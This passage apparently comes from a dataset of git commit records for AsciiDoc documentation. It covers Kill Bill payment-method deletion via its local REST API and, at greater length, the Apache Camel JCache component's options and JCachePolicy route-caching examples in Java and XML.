\"http:\/\/127.0.0.1:8080\/1.0\/kb\/paymentMethods\/a91161b0-d159-11e3-9c1a-0800200c9a66\"\n----\n\nThe payment method will be marked as inactive in Kill Bill. The actual deletion of the information is plugin specific (delete the information in the gateway, etc.).\n\nNote that by default you cannot delete the default payment method on an account (because it is assumed to be used for recurring payments). 
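For reference, a sketch of what that forced deletion looks like, using the override flag described in the next sentence and the placeholder payment method id from above:

[source,bash]
----
curl -v \
     -X DELETE \
     -u admin:password \
     -H 'X-Killbill-ApiKey:bob' \
     -H 'X-Killbill-ApiSecret:lazar' \
     -H 'X-Killbill-CreatedBy: creator' \
     "http://127.0.0.1:8080/1.0/kb/paymentMethods/a91161b0-d159-11e3-9c1a-0800200c9a66?deleteDefaultPmWithAutoPayOff=true"
----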
If you really want to delete it though, you can pass the query parameter deleteDefaultPmWithAutoPayOff=true to the previous call. This will delete it and set the account in AUTO_PAY_OFF (invoices won't be paid automatically anymore).\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af7797084f1d75bcb7d3b8be9e3621a887729516","subject":"Update jcache-component.adoc","message":"Update jcache-component.adoc\n","repos":"zregvart\/camel,apache\/camel,tdiesler\/camel,nicolaferraro\/camel,tadayosi\/camel,DariusX\/camel,adessaigne\/camel,mcollovati\/camel,adessaigne\/camel,mcollovati\/camel,apache\/camel,ullgren\/camel,nicolaferraro\/camel,pax95\/camel,nicolaferraro\/camel,DariusX\/camel,cunningt\/camel,tadayosi\/camel,gnodet\/camel,gnodet\/camel,nikhilvibhav\/camel,christophd\/camel,adessaigne\/camel,ullgren\/camel,christophd\/camel,pax95\/camel,pax95\/camel,christophd\/camel,cunningt\/camel,mcollovati\/camel,gnodet\/camel,alvinkwekel\/camel,tdiesler\/camel,pmoerenhout\/camel,apache\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,tdiesler\/camel,pmoerenhout\/camel,cunningt\/camel,tadayosi\/camel,pax95\/camel,pmoerenhout\/camel,tadayosi\/camel,gnodet\/camel,alvinkwekel\/camel,alvinkwekel\/camel,cunningt\/camel,gnodet\/camel,apache\/camel,tdiesler\/camel,adessaigne\/camel,christophd\/camel,apache\/camel,pax95\/camel,ullgren\/camel,cunningt\/camel,nicolaferraro\/camel,zregvart\/camel,nikhilvibhav\/camel,tdiesler\/camel,pmoerenhout\/camel,christophd\/camel,adessaigne\/camel,adessaigne\/camel,DariusX\/camel,apache\/camel,cunningt\/camel,tdiesler\/camel,christophd\/camel,tadayosi\/camel,DariusX\/camel,alvinkwekel\/camel,ullgren\/camel,zregvart\/camel,pax95\/camel,pmoerenhout\/camel,tadayosi\/camel,mcollovati\/camel,zregvart\/camel","old_file":"components\/camel-jcache\/src\/main\/docs\/jcache-component.adoc","new_file":"components\/camel-jcache\/src\/main\/docs\/jcache-component.adoc","new_contents":"[[jcache-component]]\n= JCache Component\n\n*Since Camel 2.17*\n\n\/\/ HEADER START\n*Both producer and consumer is supported*\n\/\/ HEADER END\n\nThe JCache component enables you to perform caching operations using JSR107\/JCache as cache implementation.\n\n== URI Format\n\n[source,java]\n----------------------------\njcache:cacheName[?options]\n----------------------------\n\n== URI Options\n\n\/\/ endpoint options: START\nThe JCache endpoint is configured using URI syntax:\n\n----\njcache:cacheName\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cacheName* | *Required* The name of the cache | | String\n|===\n\n\n=== Query Parameters (24 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cacheConfiguration* (common) | A Configuration for the Cache | | Configuration\n| *cacheConfigurationProperties* (common) | The Properties for the javax.cache.spi.CachingProvider to create the CacheManager | | Properties\n| *cachingProvider* (common) | The fully qualified class name of the javax.cache.spi.CachingProvider | | String\n| *configurationUri* (common) | An implementation specific URI for the CacheManager | | String\n| *managementEnabled* (common) | Whether management gathering is enabled | false | boolean\n| *readThrough* (common) | If read-through caching should be used | false | boolean\n| *statisticsEnabled* (common) | Whether statistics 
gathering is enabled | false | boolean\n| *storeByValue* (common) | If cache should use store-by-value or store-by-reference semantics | true | boolean\n| *writeThrough* (common) | If write-through caching should be used | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *filteredEvents* (consumer) | Events a consumer should filter (multiple events can be separated by comma). If using filteredEvents option, then eventFilters one will be ignored | | String\n| *oldValueRequired* (consumer) | if the old value is required for events | false | boolean\n| *synchronous* (consumer) | if the event listener should block the thread causing the event | false | boolean\n| *eventFilters* (consumer) | The CacheEntryEventFilter. If using eventFilters option, then filteredEvents one will be ignored | | List\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *action* (producer) | To configure using a cache operation by default. If an operation in the message header, then the operation from the header takes precedence. | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *cacheLoaderFactory* (advanced) | The CacheLoader factory | | Factory\n| *cacheWriterFactory* (advanced) | The CacheWriter factory | | Factory\n| *createCacheIfNotExists* (advanced) | Configure if a cache need to be created if it does exist or can't be pre-configured. | true | boolean\n| *expiryPolicyFactory* (advanced) | The ExpiryPolicy factory | | Factory\n| *lookupProviders* (advanced) | Configure if a camel-cache should try to find implementations of jcache api in runtimes like OSGi. 
| false | boolean\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel.springboot<\/groupId>\n <artifactId>camel-jcache-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 9 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.jcache.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.jcache.bridge-error-handler* | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | Boolean\n| *camel.component.jcache.cache-configuration* | A Configuration for the Cache. The option is a javax.cache.configuration.Configuration type. | | String\n| *camel.component.jcache.cache-configuration-properties* | Properties to configure jcache | | Map\n| *camel.component.jcache.cache-configuration-properties-ref* | References to an existing Properties or Map to lookup in the registry to use for configuring jcache. | | String\n| *camel.component.jcache.caching-provider* | The fully qualified class name of the javax.cache.spi.CachingProvider | | String\n| *camel.component.jcache.configuration-uri* | An implementation specific URI for the CacheManager | | String\n| *camel.component.jcache.enabled* | Whether to enable auto configuration of the jcache component. This is enabled by default. | | Boolean\n| *camel.component.jcache.lazy-start-producer* | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n\n\n\n\n\n\n\n\n\/\/ component options: START\nThe JCache component supports 8 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cachingProvider* (common) | The fully qualified class name of the javax.cache.spi.CachingProvider | | String\n| *cacheConfiguration* (common) | A Configuration for the Cache | | Configuration\n| *cacheConfiguration Properties* (common) | Properties to configure jcache | | Map\n| *cacheConfiguration PropertiesRef* (common) | References to an existing Properties or Map to lookup in the registry to use for configuring jcache. 
| | String\n| *configurationUri* (common) | An implementation specific URI for the CacheManager | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n|===\n\/\/ component options: END\n\n== JCache Policy\n\nThe JCachePolicy is an interceptor around a route that caches the \"result of the route\" - the message body - after the route is completed.\n If next time the route is called with a \"similar\" Exchange, the cached value is used on the Exchange instead of executing the route.\n The policy uses the JSR107\/JCache API of a cache implementation, so it's required to add one (e.g. Hazelcast, Ehcache) to the classpath.\n\nThe policy takes a _key_ value from the received Exchange to get or store values in the cache. By default the _key_ is the message body.\n For example if the route - having a JCachePolicy - receives an Exchange with a String body \"fruit\" and the body at the\n end of the route is \"apple\", it stores a _key\/value_ pair \"fruit=apple\" in the cache. If next time another Exchange arrives\n with a body \"fruit\", the value \"apple\" is taken from the cache instead of letting the route process the Exchange.\n\nSo by default the message body at the beginning of the route is the cache _key_ and the body at the end is the stored _value_.\n It's possible to use something else as _key_ by setting a Camel Expression via _.setKeyExpression()_\n that will be used to determine the key.\n\nThe policy needs a JCache Cache. It can be set directly by _.setCache()_ or the policy will try to get or create the Cache\n based on the other parameters set.\n\nSimilar caching solution is available for example in Spring using the @Cacheable annotation.\n\n== JCachePolicy Fields\n\n\n[width=\"100%\",cols=\"2,5,3,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cache* | The Cache to use to store the cached values. If this value is set, _cacheManager_, _cacheName_ and _cacheConfiguration_ is ignored. | | Cache\n| *cacheManager* | The CacheManager to use to lookup or create the Cache. Used only if _cache_ is not set. | Try to find a CacheManager in CamelContext registry or calls the standard JCache _Caching.getCachingProvider().getCacheManager()_. | CacheManager\n| *cacheName* | Name of the cache. Get the Cache from cacheManager or create a new one if it doesn't exist. 
| RouteId of the route. | String\n| *cacheConfiguration* | JCache cache configuration to use if a new Cache is created | Default new _MutableConfiguration_ object. | CacheConfiguration\n| *keyExpression* | An Expression to evaluate to determine the cache key. | Exchange body | Expression\n| *enabled* | If policy is not enabled, no wrapper processor is added to the route. It has impact only during startup, not during runtime. For example it can be used to disable caching from properties. | true | boolean\n|===\n\n== How to determine cache to use?\n\n\n== Set cache\n\nThe cache used by the policy can be set directly. This means you have to configure the cache yourself and get a JCache Cache object,\n but this gives the most flexibility. For example it can be setup in the config xml of the cache provider (Hazelcast, EhCache, ...)\n and used here. Or it's possible to use the standard Caching API as below:\n\n\n[source,java]\n----------------------------\nMutableConfiguration configuration = new MutableConfiguration<>();\nconfiguration.setTypes(String.class, Object.class);\nconfiguration.setExpiryPolicyFactory(CreatedExpiryPolicy.factoryOf(new Duration(TimeUnit.MINUTES, 60)));\nCacheManager cacheManager = Caching.getCachingProvider().getCacheManager();\nCache cache = cacheManager.createCache(\"orders\",configuration);\n\nJCachePolicy jcachePolicy = new JCachePolicy();\njcachePolicy.setCache(cache);\n\nfrom(\"direct:get-orders\")\n .policy(jcachePolicy)\n .log(\"Getting order with id: ${body}\")\n .bean(OrderService.class,\"findOrderById(${body})\");\n----------------------------\n\n== Set cacheManager\n\nIf the _cache_ is not set, the policy will try to lookup or create the cache automatically.\n If the _cacheManager_ is set on the policy, it will try to get cache with the set _cacheName_ (routeId by default) from the CacheManager.\n If the cache does not exist it will create a new one using the _cacheConfiguration_ (new MutableConfiguration by default).\n\n[source,java]\n----------------------------\n\/\/In a Spring environment for example the CacheManager may already exist as a bean\n@Autowire\nCacheManager cacheManager;\n...\n\n\/\/Cache \"items\" is used or created if not exists\nJCachePolicy jcachePolicy = new JCachePolicy();\njcachePolicy.setCacheManager(cacheManager);\njcachePolicy.setCacheName(\"items\")\n----------------------------\n\n== Find cacheManager\n\nIf _cacheManager_ (and the _cache_) is not set, the policy will try to find a JCache CacheManager object:\n\n* Lookup a CacheManager in Camel registry - that falls back on JNDI or Spring context based on the environment\n* Use the standard api _Caching.getCachingProvider().getCacheManager()_\n\n[source,java]\n----------------------------\n\/\/A Cache \"getorders\" will be used (or created) from the found CacheManager\nfrom(\"direct:get-orders\").routeId(\"getorders\")\n .policy(new JCachePolicy())\n .log(\"Getting order with id: ${body}\")\n .bean(OrderService.class,\"findOrderById(${body})\");\n----------------------------\n\n== Partially wrapped route\n\nIn the examples above the whole route was executed or skipped. 
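To make "skipped" concrete, here is a minimal test-style sketch; `template` is assumed to be a Camel `ProducerTemplate` and `cache` the JCache Cache used by the policy, with names taken from the examples above:

[source,java]
----------------------------
// Pre-populate the cache used by the policy for the key "42".
cache.put("42", "cached-order-42");

// This send finds "42" in the cache, so the processors wrapped by the
// policy are skipped and the cached value becomes the message body.
Object hit = template.requestBody("direct:get-orders", "42");

// An uncached key still executes the route body and stores the result.
Object miss = template.requestBody("direct:get-orders", "43");
----------------------------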
A policy can be used to wrap only a segment of the route instead of all processors.\n\n[source,java]\n----------------------------\nfrom(\"direct:get-orders\")\n .log(\"Order requested: ${body}\")\n .policy(new JCachePolicy())\n .log(\"Getting order with id: ${body}\")\n .bean(OrderService.class,\"findOrderById(${body})\")\n .end()\n .log(\"Order found: ${body}\");\n----------------------------\n\nThe _.log()_ at the beginning and at the end of the route is always called, but the section inside _.policy()_ and _.end()_ is executed based on the cache.\n\n== KeyExpression\n\nBy default the policy uses the received Exchange body as _key_, so the default expression is like _simple(\"$\\{body\\})_.\n We can set a different Camel Expression as _keyExpression_ which will be evaluated to determine the key.\n For example if we try to find an _order_ by an _orderId_ which is in the message headers,\n set _header(\"orderId\")_ (or _simple(\"${header.orderId})_ as _keyExpression_.\n\nThe expression is evaluated only once at the beginning of the route to determine the _key_. If nothing was found in cache,\n this _key_ is used to store the _value_ in cache at the end of the route.\n\n[source,java]\n----------------------------\nMutableConfiguration configuration = new MutableConfiguration<>();\nconfiguration.setTypes(String.class, Order.class);\nconfiguration.setExpiryPolicyFactory(CreatedExpiryPolicy.factoryOf(new Duration(TimeUnit.MINUTES, 10)));\n\nJCachePolicy jcachePolicy = new JCachePolicy();\njcachePolicy.setCacheConfiguration(configuration);\njcachePolicy.setCacheName(\"orders\")\njcachePolicy.setKeyExpression(simple(\"${header.orderId}))\n\n\/\/The cache key is taken from \"orderId\" header.\nfrom(\"direct:get-orders\")\n .policy(jcachePolicy)\n .log(\"Getting order with id: ${header.orderId}\")\n .bean(OrderService.class,\"findOrderById(${header.orderId})\");\n----------------------------\n\n== Camel XML DSL examples\n\n== Use JCachePolicy in an XML route\n\nIn Camel XML DSL we need a named reference to the JCachePolicy instance (registered in CamelContext or simply in Spring).\n We have to wrap the route between <policy>...<\/policy> tags after <from>.\n\n[source,xml]\n----------------------------\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:get-order\"\/>\n <policy ref=\"jCachePolicy\" >\n <setBody>\n <method ref=\"orderService\" method=\"findOrderById(${body})\"\/>\n <\/setBody>\n <\/policy>\n <\/route>\n<\/camelContext>\n----------------------------\n\nSee this example when only a part of the route is wrapped:\n\n[source,xml]\n----------------------------\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:get-order\"\/>\n <log message=\"Start - This is always called. body:${body}\"\/>\n <policy ref=\"jCachePolicy\" >\n <log message=\"Executing route, not found in cache. body:${body}\"\/>\n <setBody>\n <method ref=\"orderService\" method=\"findOrderById(${body})\"\/>\n <\/setBody>\n <\/policy>\n <log message=\"End - This is always called. 
body:${body}\"\/>\n <\/route>\n<\/camelContext>\n----------------------------\n\n\n== Define CachePolicy in Spring\n\nIt's more convenient to create a JCachePolicy in Java especially within a RouteBuilder using the Camel DSL expressions,\n but see this example to define it in a Spring XML:\n\n[source,xml]\n----------------------------\n<bean id=\"jCachePolicy\" class=\"org.apache.camel.component.jcache.policy.JCachePolicy\">\n <property name=\"cacheName\" value=\"spring\"\/>\n <property name=\"keyExpression\">\n <bean class=\"org.apache.camel.model.language.SimpleExpression\">\n <property name=\"expression\" value=\"${header.mykey}\"\/>\n <\/bean>\n <\/property>\n<\/bean>\n----------------------------\n\n== Create Cache from XML\n\nIt's not strictly speaking related to Camel XML DSL, but JCache providers usually have a way to configure the cache in an XML file.\n For example with Hazelcast you can add a _hazelcast.xml_ to classpath to configure the cache \"spring\" used in the example above.\n\n[source,xml]\n----------------------------\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<hazelcast xmlns=\"http:\/\/www.hazelcast.com\/schema\/config\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.hazelcast.com\/schema\/config hazelcast-config-3.11.xsd\" >\n\n <cache name=\"spring\">\n <key-type class-name=\"java.lang.String\"\/>\n <value-type class-name=\"java.lang.String\"\/>\n <expiry-policy-factory>\n <timed-expiry-policy-factory expiry-policy-type=\"CREATED\" duration-amount=\"60\" time-unit=\"MINUTES\"\/>\n <\/expiry-policy-factory>\n <\/cache>\n\n<\/hazelcast>\n----------------------------\n\n\n== Special scenarios and error handling\n\nIf the Cache used by the policy is closed (can be done dynamically), the whole caching functionality is skipped,\n the route will be executed every time.\n\nIf the determined _key_ is _null_, nothing is looked up or stored in cache.\n\nIn case of an exception during the route, the error handled is called as always. 
If the exception gets _handled()_,\n the policy stores the Exchange body, otherwise nothing is added to the cache.\n If an exception happens during evaluating the keyExpression, the routing fails, the error handler is called as normally.\n","old_contents":"[[jcache-component]]\n= JCache Component\n\n*Since Camel 2.17*\n\n\/\/ HEADER START\n*Both producer and consumer is supported*\n\/\/ HEADER END\n\nThe JCache component enables you to perform caching operations using JSR107\/JCache as cache implementation.\n\n== URI Format\n\n[source,java]\n----------------------------\njcache:cacheName[?options]\n----------------------------\n\n== URI Options\n\n\/\/ endpoint options: START\nThe JCache endpoint is configured using URI syntax:\n\n----\njcache:cacheName\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cacheName* | *Required* The name of the cache | | String\n|===\n\n\n=== Query Parameters (24 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cacheConfiguration* (common) | A Configuration for the Cache | | Configuration\n| *cacheConfigurationProperties* (common) | The Properties for the javax.cache.spi.CachingProvider to create the CacheManager | | Properties\n| *cachingProvider* (common) | The fully qualified class name of the javax.cache.spi.CachingProvider | | String\n| *configurationUri* (common) | An implementation specific URI for the CacheManager | | String\n| *managementEnabled* (common) | Whether management gathering is enabled | false | boolean\n| *readThrough* (common) | If read-through caching should be used | false | boolean\n| *statisticsEnabled* (common) | Whether statistics gathering is enabled | false | boolean\n| *storeByValue* (common) | If cache should use store-by-value or store-by-reference semantics | true | boolean\n| *writeThrough* (common) | If write-through caching should be used | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *filteredEvents* (consumer) | Events a consumer should filter (multiple events can be separated by comma). If using filteredEvents option, then eventFilters one will be ignored | | String\n| *oldValueRequired* (consumer) | if the old value is required for events | false | boolean\n| *synchronous* (consumer) | if the event listener should block the thread causing the event | false | boolean\n| *eventFilters* (consumer) | The CacheEntryEventFilter. If using eventFilters option, then filteredEvents one will be ignored | | List\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. 
| | ExchangePattern\n| *action* (producer) | To configure using a cache operation by default. If an operation in the message header, then the operation from the header takes precedence. | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *cacheLoaderFactory* (advanced) | The CacheLoader factory | | Factory\n| *cacheWriterFactory* (advanced) | The CacheWriter factory | | Factory\n| *createCacheIfNotExists* (advanced) | Configure if a cache need to be created if it does exist or can't be pre-configured. | true | boolean\n| *expiryPolicyFactory* (advanced) | The ExpiryPolicy factory | | Factory\n| *lookupProviders* (advanced) | Configure if a camel-cache should try to find implementations of jcache api in runtimes like OSGi. | false | boolean\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel.springboot<\/groupId>\n <artifactId>camel-jcache-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 9 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.jcache.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.jcache.bridge-error-handler* | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | Boolean\n| *camel.component.jcache.cache-configuration* | A Configuration for the Cache. The option is a javax.cache.configuration.Configuration type. | | String\n| *camel.component.jcache.cache-configuration-properties* | Properties to configure jcache | | Map\n| *camel.component.jcache.cache-configuration-properties-ref* | References to an existing Properties or Map to lookup in the registry to use for configuring jcache. 
| | String\n| *camel.component.jcache.caching-provider* | The fully qualified class name of the javax.cache.spi.CachingProvider | | String\n| *camel.component.jcache.configuration-uri* | An implementation specific URI for the CacheManager | | String\n| *camel.component.jcache.enabled* | Whether to enable auto configuration of the jcache component. This is enabled by default. | | Boolean\n| *camel.component.jcache.lazy-start-producer* | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n\n\n\n\n\n\n\n\n\/\/ component options: START\nThe JCache component supports 8 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cachingProvider* (common) | The fully qualified class name of the javax.cache.spi.CachingProvider | | String\n| *cacheConfiguration* (common) | A Configuration for the Cache | | Configuration\n| *cacheConfiguration Properties* (common) | Properties to configure jcache | | Map\n| *cacheConfiguration PropertiesRef* (common) | References to an existing Properties or Map to lookup in the registry to use for configuring jcache. | | String\n| *configurationUri* (common) | An implementation specific URI for the CacheManager | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n|===\n\/\/ component options: END\n\n== JCache Policy\n\nThe JCachePolicy is an interceptor around a route that caches the \"result of the route\" - the message body - after the route is completed.\n If next time the route is called with a \"similar\" Exchange, the cached value is used on the Exchange instead of executing the route.\n The policy uses the JSR107\/JCache API of a cache implementation, so it's required to add one (e.g. 
Hazelcast, Ehcache) to the classpath.\n\nThe policy takes a _key_ value from the received Exchange to get or store values in the cache. By default the _key_ is the message body.\n For example if the route - having a JCachePolicy - receives an Exchange with a String body \"fruit\" and the body at the\n end of the route is \"apple\", it stores a _key\/value_ pair \"fruit=apple\" in the cache. If next time another Exchange arrives\n with a body \"fruit\", the value \"apple\" is taken from the cache instead of letting the route process the Exchange.\n\nSo by default the message body at the beginning of the route is the cache _key_ and the body at the end is the stored _value_.\n It's possible to use something else as _key_ by setting a Camel Expression via _.setKeyExpression()_\n that will be used to determine the key.\n\nThe policy needs a JCache Cache. It can be set directly by _.setCache()_ or the policy will try to get or create the Cache\n based on the other parameters set.\n\nSimilar caching solution is available for example in Spring using the @Cacheable annotation.\n\n== JCachePolicy Fields\n\n\n[width=\"100%\",cols=\"2,5,3,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cache* | The Cache to use to store the cached values. If this value is set, _cacheManager_, _cacheName_ and _cacheConfiguration_ is ignored. | | Cache\n| *cacheManager* | The CacheManager to use to lookup or create the Cache. Used only if _cache_ is not set. | Try to find a CacheManager in CamelContext registry or calls the standard JCache _Caching.getCachingProvider().getCacheManager()_. | CacheManager\n| *cacheName* | Name of the cache. Get the Cache from cacheManager or create a new one if it doesn't exist. | RouteId of the route. | String\n| *cacheConfiguration* | JCache cache configuration to use if a new Cache is created | Default new _MutableConfiguration_ object. | CacheConfiguration\n| *keyExpression* | An Expression to evaluate to determine the cache key. | Exchange body | Expression\n| *enabled* | If policy is not enabled, no wrapper processor is added to the route. It has impact only during startup, not during runtime. For example it can be used to disable caching from properties. | true | boolean\n|===\n\n== How to determine cache to use?\n\n\n== Set cache\n\nThe cache used by the policy can be set directly. This means you have to configure the cache yourself and get a JCache Cache object,\n but this gives the most flexibility. For example it can be setup in the config xml of the cache provider (Hazelcast, EhCache, ...)\n and used here. 
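For the provider-config approach, a rough sketch of fetching such an externally configured cache through the plain JCache API; the config file name and cache name are illustrative assumptions, and exception handling is omitted:

[source,java]
----------------------------
// Assumes e.g. an ehcache.xml on the classpath that already defines
// a cache named "orders".
CachingProvider provider = Caching.getCachingProvider();
CacheManager cacheManager = provider.getCacheManager(
        MyRouteBuilder.class.getResource("/ehcache.xml").toURI(),
        MyRouteBuilder.class.getClassLoader());
Cache<String, Object> cache = cacheManager.getCache("orders", String.class, Object.class);
----------------------------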
Or it's possible to use the standard Caching API as below:\n\n\n[source,java]\n----------------------------\nMutableConfiguration configuration = new MutableConfiguration<>();\nconfiguration.setTypes(String.class, Object.class);\nconfiguration.setExpiryPolicyFactory(CreatedExpiryPolicy.factoryOf(new Duration(TimeUnit.MINUTES, 60)));\nCacheManager cacheManager = Caching.getCachingProvider().getCacheManager();\nCache cache = cacheManager.createCache(\"orders\",configuration);\n\nJCachePolicy jcachePolicy = new JCachePolicy();\njcachePolicy.setCache(cache);\n\nfrom(\"direct:get-orders\")\n .policy(jcachePolicy)\n .log(\"Getting order with id: ${body}\")\n .bean(OrderService.class,\"findOrderById(${body})\");\n----------------------------\n\n== Set cacheManager\n\nIf the _cache_ is not set, the policy will try to lookup or create the cache automatically.\n If the _cacheManager_ is set on the policy, it will try to get cache with the set _cacheName_ (routeId by default) from the CacheManager.\n Is the cache does not exist it will create a new one using the _cacheConfiguration_ (new MutableConfiguration by default).\n\n[source,java]\n----------------------------\n\/\/In a Spring environment for example the CacheManager may already exist as a bean\n@Autowire\nCacheManager cacheManager;\n...\n\n\/\/Cache \"items\" is used or created if not exists\nJCachePolicy jcachePolicy = new 